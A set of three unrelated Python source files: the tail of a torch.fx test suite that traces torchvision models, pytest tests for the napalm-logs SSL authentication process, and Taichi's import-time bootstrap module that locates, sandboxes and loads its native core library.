    """Auto-generated smoke tests for torch.fx on the torchvision model zoo.

    For every model constructor found in ``torchvision.models`` (and its
    ``segmentation`` / ``detection`` / ``video`` submodules) a ``test_*``
    method is attached to this class by ``generate_tests()`` at import time.
    Each generated test symbolically traces the model, checks the traced
    graph matches eager execution, then TorchScript-compiles the graph and
    checks again — unless the model is listed as an expected failure.
    """

    def setUp(self):
        # Checking for mutable operations while tracing is feature flagged
        # Enable it in testing but not by default
        self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
        torch.fx.proxy.TracerBase.check_mutable_operations = True

    def tearDown(self):
        # Restore the process-global tracer flag saved in setUp so other
        # test classes run with the default behavior.
        torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag

    # (exception type, message regex) pairs describing expected failures.
    PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
    INCONSISTENT_TYPE = (
        RuntimeError,
        r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
    )

    # Models whose forward() iterates over traced values, which FX cannot
    # represent symbolically — tracing these is expected to raise.
    UNTRACEABLE_MODELS = {
        "fasterrcnn_resnet50_fpn": PROXY_ITERATED,
        "fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
        "fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
        "maskrcnn_resnet50_fpn": PROXY_ITERATED,
        "keypointrcnn_resnet50_fpn": PROXY_ITERATED,
        "retinanet_resnet50_fpn": PROXY_ITERATED,
    }
    # Models that trace fine but whose traced graph fails torch.jit.script.
    UNSCRIPTABLE_MODELS = {
        "googlenet": INCONSISTENT_TYPE,
        "inception_v3": INCONSISTENT_TYPE,
    }

    # Maps model name -> callable extracting a comparable value from the
    # model's output (some models return dicts or tuples). Default is
    # identity for models not listed here.
    output_transform = {
        "fcn_resnet50": lambda x: x["out"],
        "fcn_resnet101": lambda x: x["out"],
        "deeplabv3_resnet50": lambda x: x["out"],
        "deeplabv3_resnet101": lambda x: x["out"],
        "deeplabv3_mobilenet_v3_large": lambda x: x["out"],
        "lraspp_mobilenet_v3_large": lambda x: x["out"],
        "fasterrcnn_resnet50_fpn": lambda x: x[1],
        "fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
        "fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
        "maskrcnn_resnet50_fpn": lambda x: x[1],
        "keypointrcnn_resnet50_fpn": lambda x: x[1],
        "retinanet_resnet50_fpn": lambda x: x[1],
    }

    @classmethod
    def generate_test_fn(cls, name, model_fn, x, kwargs):
        """Build one test closure for model `name`.

        The model is constructed via ``model_fn(**kwargs)`` and evaluated on
        input `x`. The closure routes through the expected-failure tables
        above instead of asserting success unconditionally.
        """
        def run_test(self):
            model = model_fn(**kwargs)
            model = model.eval()
            if name in self.UNTRACEABLE_MODELS:
                # Tracing itself is expected to fail for this model.
                err, exc = self.UNTRACEABLE_MODELS[name]
                with self.assertRaisesRegex(err, exc):
                    graph = symbolic_trace(model)
            else:
                out_transform = self.output_transform.get(name, lambda x: x)
                graph : torch.fx.GraphModule = symbolic_trace(model)
                # Traced graph must reproduce eager results exactly.
                a = out_transform(model(x))
                b = out_transform(graph(x))
                self.assertEqual(a, b)

                if name in self.UNSCRIPTABLE_MODELS:
                    # Scripting the traced graph is expected to fail.
                    err, exc = self.UNSCRIPTABLE_MODELS[name]
                    with self.assertRaisesRegex(err, exc):
                        script = torch.jit.script(graph)
                else:
                    # Scripted graph must also reproduce eager results.
                    script = torch.jit.script(graph)
                    c = out_transform(script(x))
                    self.assertEqual(a, c)
        return run_test

    @classmethod
    def generate_classification_tests(cls):
        # Public constructors are lowercase-first callables; skip private
        # names and classes (PascalCase).
        for k, v in torchvision_models.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_' + k
                # inception_v3 requires a larger minimum input size.
                x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
                kwargs = dict(num_classes=50)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_segmentation_tests(cls):
        for k, v in torchvision_models.segmentation.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_segmentation_' + k
                x = torch.rand(1, 3, 32, 32)
                kwargs = dict(num_classes=10, pretrained_backbone=False)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_detection_tests(cls):
        for k, v in torchvision_models.detection.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_detection_' + k
                # Detection models take a list of 3D image tensors.
                x = [torch.rand(3, 300, 300)]
                kwargs = dict(num_classes=10, pretrained_backbone=False)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_video_tests(cls):
        for k, v in torchvision_models.video.__dict__.items():
            if callable(v) and k[0].lower() == k[0] and k[0] != "_":
                test_name = 'test_torchvision_models_video_' + k
                # Video models take (batch, channels, frames, H, W).
                x = torch.rand(1, 3, 4, 112, 112)
                kwargs = dict(num_classes=50)
                model_test = cls.generate_test_fn(k, v, x, kwargs)
                setattr(cls, test_name, model_test)

    @classmethod
    def generate_tests(cls):
        cls.generate_classification_tests()
        cls.generate_detection_tests()
        cls.generate_segmentation_tests()
        cls.generate_video_tests()

# Attach the generated tests only when torchvision is importable; the
# @skipIfNoTorchVision decorator handles the class-level skip message.
if HAS_TORCHVISION:
    TestVisionTracing.generate_tests()

if __name__ == '__main__':
    run_tests()
test_auth.py
# -*- coding: utf-8 -*-
'''
Test the auth process.

NOTE(review): these tests are ORDER-DEPENDENT. They rely on pytest running
them top-to-bottom in file order: ``test_successful_start`` launches the
auth process into the module-global ``AUTH_PROC``, the following tests
assert against that live process, and ``test_successful_stop`` tears it
down. Reordering or running a subset in isolation will fail.
'''
from __future__ import absolute_import
from __future__ import unicode_literals

# Import pythond stdlib
import time
import logging
from multiprocessing import Process

# Import third party libs
import pytest
import nacl.utils
import nacl.secret
import nacl.signing
import nacl.encoding

# Import napalm-logs
import napalm_logs.exceptions
import napalm_logs.config as defaults
from napalm_logs.utils import ClientAuth
from napalm_logs.auth import NapalmLogsAuthProc

log = logging.getLogger(__name__)

# Handle to the auth process started by test_successful_start and shared by
# the later tests in this module.
AUTH_PROC = None


def _generate_test_keys():
    '''
    Generate proper PK and SGN keys.

    Returns a tuple (symmetric private key bytes, hex-encoded verify key)
    suitable for constructing a NapalmLogsAuthProc.
    '''
    log.debug('Generating a testing private key')
    priv_key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE)
    log.debug('Generating the signing key')
    signing_key = nacl.signing.SigningKey.generate()
    verify_key = signing_key.verify_key
    sgn_verify_hex = verify_key.encode(encoder=nacl.encoding.HexEncoder)
    return priv_key, sgn_verify_hex


def test_invalid_cert():
    '''
    Testing if the auth process dies when
    unable to open the SSL certificate or keyfile.
    '''
    nlap = NapalmLogsAuthProc('fake_cert',
                              'fake_keyfile',
                              'fake_pk',
                              'fake_hex')
    with pytest.raises(IOError):
        nlap.start()


# NOTE(review): "missmatch" [sic] — the typo is part of the public test name
# and may be referenced by CI selectors; renaming would be a breaking change.
def test_crt_missmatch():
    '''
    Forged certificate should raise
    napalm_logs.exceptions.SSLMismatchException.
    '''
    nlap = NapalmLogsAuthProc('tests/auth/forged.crt',
                              'tests/auth/forged.key',
                              'fake_pk',
                              'fake_hex')
    with pytest.raises(napalm_logs.exceptions.SSLMismatchException):
        nlap.start()


def test_client_auth_fail_server_down():
    '''
    Test client connect failure when server is not started yet.
    '''
    # max_try=1 / timeout=.1 keep the expected failure fast.
    with pytest.raises(napalm_logs.exceptions.ClientConnectException):
        client = ClientAuth('tests/auth/server.crt',  # noqa
                            max_try=1,
                            timeout=.1)


def test_successful_start():
    '''
    Test that the auth process can start properly
    when valid certificate and key are configured.
    '''
    global AUTH_PROC
    pk, sgn_key = _generate_test_keys()
    nlap = NapalmLogsAuthProc('tests/auth/server.crt',
                              'tests/auth/server.key',
                              pk,
                              sgn_key)
    # Run the auth process in the background; subsequent tests talk to it.
    AUTH_PROC = Process(target=nlap.start)
    AUTH_PROC.start()


def test_twice_bind():
    '''
    Test that binding twice on the same host/port
    fails, and raises napalm_logs.exceptions.BindException.
    '''
    pk, sgn_key = _generate_test_keys()
    nlap = NapalmLogsAuthProc('tests/auth/server.crt',
                              'tests/auth/server.key',
                              pk,
                              sgn_key)
    assert AUTH_PROC.is_alive()
    time.sleep(.1)  # waiting for the auth socket
    with pytest.raises(napalm_logs.exceptions.BindException):
        nlap.start()
    nlap.stop()


def test_client_auth_fail_wrong_port():
    '''
    Test client connect failure on wrong server port.
    '''
    assert AUTH_PROC.is_alive()
    with pytest.raises(napalm_logs.exceptions.ClientConnectException):
        client = ClientAuth('tests/auth/server.crt',
                            port=1234,
                            max_try=1,
                            timeout=.1)
        client.stop()


def test_client_auth():
    '''
    Test the auth process startup and a client
    that retrieves the pk and sgn key.
    '''
    assert AUTH_PROC.is_alive()
    time.sleep(.1)  # waiting for the auth socket
    client = ClientAuth('tests/auth/server.crt')
    client.stop()


def test_client_keep_alive():
    '''
    Test that the client receives keepalives from the auth process.
    '''
    assert AUTH_PROC.is_alive()
    client = ClientAuth('tests/auth/server.crt',
                        max_try=1,
                        timeout=.1)
    time.sleep(.1)  # wait for the client socket
    client.ssl_skt.close()  # force client socket close
    # wait for another keepalive exchange
    time.sleep(defaults.AUTH_KEEP_ALIVE_INTERVAL)
    client.stop()
    # client.stop() tries to close the auth SSL socket
    # if not alive anymore, this will raise an exception
    # therefore the test will fail


def test_successful_stop():
    '''
    Test if able to stop properly the auth process.
    '''
    assert AUTH_PROC.is_alive()
    AUTH_PROC.terminate()
    AUTH_PROC.join()
util.py
"""Taichi core bootstrap module.

Locates, links and imports the ``taichi_core`` native shared library for the
current platform, in either "release" (installed package) or "development"
(source checkout) mode. NOTE: importing this module has heavy side effects —
it mutates ``sys.path`` and environment variables, may copy the core library
into a temporary sandbox, and loads native code at import time.
"""
import os
import re
import shutil
import sys
import ctypes
from pathlib import Path
from colorama import Fore, Back, Style
from .settings import *

# Hard-require Python 3.6+ before doing anything else.
if sys.version_info[0] < 3 or sys.version_info[1] <= 5:
    print("\nPlease restart with Python 3.6+\n")
    print("Current Python version:", sys.version_info)
    exit(-1)

# Populated by import_ti_core(); holds the imported taichi_core module.
ti_core = None


def in_docker():
    """Return True when running inside the Taichi Docker image (flagged by
    the TI_IN_DOCKER environment variable)."""
    if os.environ.get("TI_IN_DOCKER", "") == "":
        return False
    else:
        return True


def import_ti_core(tmp_dir=None):
    """Import the taichi_core shared object into the global ``ti_core``.

    On non-Windows, temporarily sets dlopen flags so the core's symbols are
    resolved eagerly and bound locally; on Windows, extends PATH so the
    dependent DLLs next to the pyd can be found.
    """
    global ti_core
    if get_os_name() != 'win':
        old_flags = sys.getdlopenflags()
        # 2 | 8 == RTLD_NOW | RTLD_DEEPBIND (numeric values used directly;
        # os.RTLD_* constants would be the self-documenting equivalent).
        sys.setdlopenflags(2 | 8)  # RTLD_NOW | RTLD_DEEPBIND
    else:
        pyddir = os.path.join(package_root(), 'lib')
        os.environ['PATH'] += ';' + pyddir
    try:
        import taichi_core as core
    except Exception as e:
        if isinstance(e, ImportError):
            print(Fore.YELLOW + "Share object taichi_core import failed, "
                  "check this page for possible solutions:\n"
                  "https://taichi.readthedocs.io/en/stable/install.html#troubleshooting"
                  + Fore.RESET)
        raise e

    ti_core = core
    if get_os_name() != 'win':
        # Restore the interpreter-wide dlopen flags saved above.
        sys.setdlopenflags(old_flags)
    lib_dir = os.path.join(package_root(), 'lib')
    core.set_lib_dir(locale_encode(lib_dir))
    if tmp_dir is not None:
        core.set_tmp_dir(locale_encode(tmp_dir))


def locale_encode(s):
    """Encode `s` using the system locale's encoding, falling back to UTF-8
    when the locale reports no encoding (TypeError from encode(None))."""
    try:
        import locale
        return s.encode(locale.getdefaultlocale()[1])
    except TypeError:
        return s.encode('utf8')


def is_ci():
    """Return True when running under CI (TI_CI=1)."""
    return os.environ.get('TI_CI', '') == '1'


def package_root():
    """Return the root directory of the installed taichi package."""
    return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../')


def is_release():
    """Release mode == no TAICHI_REPO_DIR env var (i.e. not a dev checkout)."""
    return os.environ.get('TAICHI_REPO_DIR', '') == ''


def get_core_shared_object():
    """Return the path to libtaichi_core.so for the current mode."""
    if is_release():
        directory = os.path.join(package_root(), 'lib')
    else:
        directory = get_bin_directory()
    return os.path.join(directory, 'libtaichi_core.so')


def get_repo():
    """Return a GitPython Repo for the development checkout (dev mode only)."""
    from git import Repo
    repo = Repo(get_repo_directory())
    return repo


def print_red_bold(*args, **kwargs):
    """print() wrapper that renders the message in bright red."""
    print(Fore.RED + Style.BRIGHT, end='')
    print(*args, **kwargs)
    print(Style.RESET_ALL, end='')


# On Windows, copy the core DLL into a per-task sandbox so the build output
# is not locked by the loaded module (see the dev-mode win branch below).
create_sand_box_on_windows = True


def build():
    """Build taichi in the build directory (msbuild on Windows, make
    elsewhere), exiting the process on failure."""
    tmp_cwd = os.getcwd()
    bin_dir = get_build_directory()

    try:
        os.mkdir(bin_dir)
    # NOTE(review): bare except silently ignores ALL mkdir errors, not just
    # "already exists"; `os.makedirs(bin_dir, exist_ok=True)` would be the
    # precise form — confirm no other error is deliberately swallowed.
    except:
        pass
    os.chdir(bin_dir)

    import multiprocessing
    print('Building taichi...')
    num_make_threads = min(20, multiprocessing.cpu_count())
    if get_os_name() == 'win':
        make_ret = os.system(
            "msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln")
    else:
        make_ret = os.system('make -j {}'.format(num_make_threads))
    if make_ret != 0:
        print('  Error: Build failed.')
        exit(-1)

    os.chdir(tmp_cwd)


def check_exists(src):
    """Raise FileNotFoundError with a helpful message if `src` is missing."""
    if not os.path.exists(src):
        raise FileNotFoundError(
            f'File "{src}" not exist. Installation corrupted or build incomplete?'
        )


def prepare_sandbox():
    '''
    Returns a temporary directory, which will be automatically deleted on exit.
    It may contain the taichi_core shared object or some misc. files.
    '''
    import atexit
    import shutil
    from tempfile import mkdtemp
    tmp_dir = mkdtemp(prefix='taichi-')
    # Registered cleanup removes the whole sandbox at interpreter exit.
    atexit.register(shutil.rmtree, tmp_dir)
    print(f'[Taichi] preparing sandbox at {tmp_dir}')
    os.mkdir(os.path.join(tmp_dir, 'runtime/'))
    return tmp_dir


def get_unique_task_id():
    """Return a timestamped, randomized task id like
    task-2020-01-01-12-00-00-r01234 (used to name per-run directories)."""
    import datetime
    import random
    return datetime.datetime.now().strftime('task-%Y-%m-%d-%H-%M-%S-r') + (
        '%05d' % random.randint(0, 10000))


# ---------------------------------------------------------------------------
# Import-time bootstrap: locate and load the native taichi_core library.
# ---------------------------------------------------------------------------
if is_release():
    print("[Taichi] mode=release")
    sys.path.append(os.path.join(package_root(), 'lib'))
    if get_os_name() != 'win':
        link_src = os.path.join(package_root(), 'lib', 'taichi_core.so')
        link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so')
        # For llvm jit to find the runtime symbols
        if not os.path.exists(link_dst):
            os.symlink(link_src, link_dst)
    import_ti_core()
    if get_os_name() != 'win':
        dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_LOCAL)

    # The C backend needs a temporary directory for the generated .c and compiled .so files:
    ti_core.set_tmp_dir(prepare_sandbox(
    ))  # TODO: always allocate a tmp_dir for all situations

    ti_core.set_python_package_dir(package_root())
    os.makedirs(ti_core.get_repo_dir(), exist_ok=True)
else:
    print("[Taichi] mode=development")
    if get_os_name() == 'osx':
        # macOS: copy the dylib into a sandbox and import it from there.
        bin_dir = get_bin_directory()
        os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory()
        lib_path = os.path.join(bin_dir, 'libtaichi_core.dylib')
        tmp_cwd = os.getcwd()
        tmp_dir = prepare_sandbox()
        check_exists(lib_path)
        shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so'))
        os.chdir(tmp_dir)
        sys.path.append(tmp_dir)
        import taichi_core as ti_core
        os.chdir(tmp_cwd)

    # TODO: unify importing infrastructure:
    elif get_os_name() == 'linux':
        bin_dir = get_bin_directory()
        if 'LD_LIBRARY_PATH' in os.environ:
            os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/'
        else:
            os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/'
        lib_path = os.path.join(bin_dir, 'libtaichi_core.so')
        check_exists(lib_path)
        tmp_cwd = os.getcwd()
        tmp_dir = prepare_sandbox()
        # NOTE(review): check_exists(lib_path) is called twice in this
        # branch; the second call is redundant.
        check_exists(lib_path)
        shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so'))
        os.chdir(tmp_dir)
        sys.path.append(tmp_dir)
        try:
            import_ti_core(tmp_dir)
        except Exception as e:
            from colorama import Fore, Back, Style
            print_red_bold("Taichi core import failed: ", end='')
            print(e)
            exit(-1)
        os.chdir(tmp_cwd)

    elif get_os_name() == 'win':
        bin_dir = get_bin_directory()
        # A libtaichi_core.dll here would indicate a stale/incorrect build
        # layout; Windows builds produce taichi_core.dll under a config dir.
        dll_path_invalid = os.path.join(bin_dir, 'libtaichi_core.dll')
        assert not os.path.exists(dll_path_invalid)

        possible_folders = ['Debug', 'RelWithDebInfo', 'Release']
        detected_dlls = []
        for folder in possible_folders:
            dll_path = os.path.join(bin_dir, folder, 'taichi_core.dll')
            if os.path.exists(dll_path):
                detected_dlls.append(dll_path)

        if len(detected_dlls) == 0:
            raise FileNotFoundError(
                f'Cannot find Taichi core dll under {get_bin_directory()}/{possible_folders}'
            )
        elif len(detected_dlls) != 1:
            print('Warning: multiple Taichi core dlls found:')
            for dll in detected_dlls:
                print(' ', dll)
            print(f'Using {detected_dlls[0]}')

        dll_path = detected_dlls[0]

        # On windows when an dll/pyd is loaded, we cannot write to it any more
        old_wd = os.getcwd()
        os.chdir(bin_dir)

        if create_sand_box_on_windows:
            # Create a sandbox for separated core lib development and loading
            folder = os.path.join(get_output_directory(), 'tmp',
                                  get_unique_task_id())

            lib_dir = os.path.join(get_repo_directory(), 'external', 'lib')
            os.environ['PATH'] += ';' + lib_dir

            os.makedirs(folder)
            shutil.copy(dll_path, os.path.join(folder, 'taichi_core.pyd'))
            os.environ['PATH'] += ';' + folder
            sys.path.append(folder)
        else:
            shutil.copy(dll_path, os.path.join(bin_dir, 'taichi_core.pyd'))
            sys.path.append(bin_dir)
        try:
            import taichi_core as ti_core
        except Exception as e:
            print(e)
            print()
            print(
                'Hint: please make sure the major and minor versions of the Python executable is correct.'
            )
            print()
            raise e

        os.chdir(old_wd)

# Optional override of the core's logging level via environment variable.
log_level = os.environ.get('TI_LOG_LEVEL', '')
if log_level:
    ti_core.set_logging_level(log_level)


def get_dll_name(name):
    """Return the platform-specific shared-library filename for module
    `name` (e.g. 'core' -> libtaichi_core.so / .dylib / taichi_core.dll)."""
    if get_os_name() == 'linux':
        return 'libtaichi_%s.so' % name
    elif get_os_name() == 'osx':
        return 'libtaichi_%s.dylib' % name
    elif get_os_name() == 'win':
        return 'taichi_%s.dll' % name
    else:
        raise Exception(f"Unknown OS: {get_os_name()}")


def load_module(name, verbose=True):
    """Load an auxiliary taichi shared library by name or path via ctypes.

    Failures are reported as a warning rather than raised, so optional
    modules do not abort startup.
    """
    if verbose:
        print('Loading module', name)
    try:
        if get_os_name() == 'osx':
            mode = ctypes.RTLD_LOCAL
        else:
            mode = ctypes.RTLD_GLOBAL
        if '.so' in name:
            # `name` already looks like a path/filename; load it directly.
            ctypes.PyDLL(name, mode=mode)
        else:
            ctypes.PyDLL(os.path.join(get_repo_directory(), 'build',
                                      get_dll_name(name)),
                         mode=mode)
    except Exception as e:
        print(Fore.YELLOW +
              "Warning: module [{}] loading failed: {}".format(name, e) +
              Style.RESET_ALL)


def at_startup():
    """One-time startup hook: ensure the dev-mode output directory exists,
    notify the core that Python import finished, and optionally start
    action recording (TI_ACTION_RECORD)."""
    if not is_release():
        output_dir = get_output_directory()
        if not os.path.exists(output_dir):
            print('Making output directory')
            os.mkdir(output_dir)

    ti_core.set_core_state_python_imported(True)

    record_file = os.environ.get('TI_ACTION_RECORD')
    if record_file:
        ti_core.start_recording(record_file)


def start_memory_monitoring(output_fn, pid=-1, interval=1):
    # NOTE(review): this function is intentionally disabled by the early
    # `return` below ("removing dependency on psutil"); everything after it
    # is dead code kept for reference.
    # removing dependency on psutil
    return
    import os, psutil, time
    if pid == -1:
        pid = os.getpid()
    import multiprocessing

    def task():
        with open(output_fn, 'w') as f:
            process = psutil.Process(pid)
            while True:
                try:
                    mem = process.memory_info().rss
                except:
                    mem = -1
                time.sleep(interval)
                print(time.time(), mem, file=f)
                f.flush()

    proc = multiprocessing.Process(target=task, daemon=True)
    proc.start()


def require_version(major, minor=None, patch=None):
    """Raise unless the loaded taichi core version is >= major.minor.patch
    with an exactly matching major version.

    NOTE(review): calling this with only `major` (or without `patch`) raises
    TypeError, because `minor`/`patch` default to None and are compared
    against ints below — the defaults suggest they were meant to be optional;
    confirm intended usage and either require all three or treat None as 0.
    """
    versions = [
        int(ti_core.get_version_major()),
        int(ti_core.get_version_minor()),
        int(ti_core.get_version_patch()),
    ]
    # Same major, and (minor, patch) lexicographically >= the requirement.
    match = major == versions[0] and (
        minor < versions[1] or minor == versions[1] and patch <= versions[2])

    if match:
        return
    else:
        print("Taichi version mismatch. required >= {}.{}.{}".format(
            major, minor, patch))
        print("Installed =", ti_core.get_version_string())
        raise Exception("Taichi version mismatch")


at_startup()


def _print_taichi_header():
    """Print the one-line startup banner (version, llvm, commit, OS, python)."""
    dev_mode = not is_release()

    header = '[Taichi] '
    if dev_mode:
        header += '<dev mode>, '
    else:
        header += f'version {ti_core.get_version_string()}, '

    llvm_version = ti_core.get_llvm_version_string()
    header += f'llvm {llvm_version}, '

    commit_hash = ti_core.get_commit_hash()
    commit_hash = commit_hash[:8]
    header += f'commit {commit_hash}, '

    header += f'{get_os_name()}, '

    py_ver = '.'.join(str(x) for x in sys.version_info[:3])
    header += f'python {py_ver}'

    print(header)


_print_taichi_header()

__all__ = [
    'ti_core',
    'build',
    'load_module',
    'start_memory_monitoring',
    'is_release',
    'package_root',
    'require_version',
]